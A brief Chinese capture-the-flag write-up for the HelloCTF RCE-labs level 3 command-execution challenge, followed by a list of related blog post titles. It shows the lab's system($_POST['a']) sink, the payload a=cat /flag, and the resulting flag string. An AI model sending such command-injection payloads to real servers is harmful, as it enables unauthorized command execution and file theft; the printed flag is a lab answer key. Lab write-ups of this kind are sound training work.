HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
枷锁—sha6 小时前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南
网络·安全·网络安全
菩提小狗6 小时前
小迪安全2023-2024|第5天:基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载_笔记|web安全|渗透测试|
笔记·安全·web安全
AZ996ZA6 小时前
自学linux的第二十一天【DHCP 服务从入门到实战】
linux·运维·服务器·php
聚铭网络6 小时前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位
网络安全
架构师沉默6 小时前
这个问题,决定你能不能进大厂!
经验分享
软件检测小牛玛7 小时前
软件功能测试机构推荐:资质权威,报告认可的软件测评机构 中承信安
经验分享·软件功能测试·第三方软件检测·软件测评机构·软件功能测试报告
方见华Richard7 小时前
方见华个人履历|中英双语版
人工智能·经验分享·交互·原型模式·空间计算
acrelwwj7 小时前
智慧照明新引擎,ASL600 4GWJ开启城市照明精细化管理新时代
大数据·经验分享·物联网
darkb1rd8 小时前
八、PHP SAPI与运行环境差异
开发语言·网络安全·php·webshell
darkb1rd9 小时前
七、PHP配置(php.ini)安全最佳实践
安全·php·webshell